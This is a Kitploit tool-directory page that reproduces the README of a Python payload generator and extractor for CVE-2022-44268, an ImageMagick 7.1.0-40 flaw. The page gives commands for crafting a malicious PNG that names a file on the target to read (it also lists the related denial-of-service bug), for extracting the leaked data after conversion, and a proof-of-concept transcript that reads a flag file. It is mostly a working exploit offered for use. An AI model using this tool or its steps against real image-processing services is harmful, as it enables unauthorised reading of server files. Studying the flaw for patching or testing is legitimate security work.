Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2022-44268 — Payload generator and extractor for CVE-2022-44268 written in Python. | Kitploit
Tools/GitHubGitHub/agathanon/cve-2022-44268
Payload GenerationVulnerability AnalysisExploitationData ExfiltrationInformation Gathering
GitHubagathanon/cve-2022-44268

cve-2022-44268

Payload generator and extractor for CVE-2022-44268 written in Python.

View Repository
4123 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-44268

Credit to the researchers who discovered this:

  • Bryan Gonzalez and the Ocelot Team

Create a malicious PNG to take advantage of ImageMagick 7.1.0-40:

  • CVE-2022-44267: Denial of Service
  • CVE-2022-44268: Information Disclosure

Disclaimer: The author of this project is not responsible for any possible harm caused by the materials of this project.

Requirements

  • Python3
  • PIL (pip install Pillow)

Usage

Crafting a PNG with craft.py:

root@kitploit:~
git clone https://github.com/agathanon/cve-2022-44268
cd cve-2022-44268
python3 craft.py original.png lol.png /path/to/file

Data extraction with extract.py:

root@kitploit:~
python3 extract.py exfil.png

PoC

root@kitploit:~
anon@computer:~/code/cve-2022-44268$ python3 craft.py original.png readflag.png $PWD/flag.txt 
anon@computer:~/code/cve-2022-44268$ convert readflag.png -resize 100x100 exfil.png
anon@computer:~/code/cve-2022-44268$ python3 extract.py exfil.png
AAAABBBBCCCC

anon@computer:~/code/cve-2022-44268$ 
Download Tool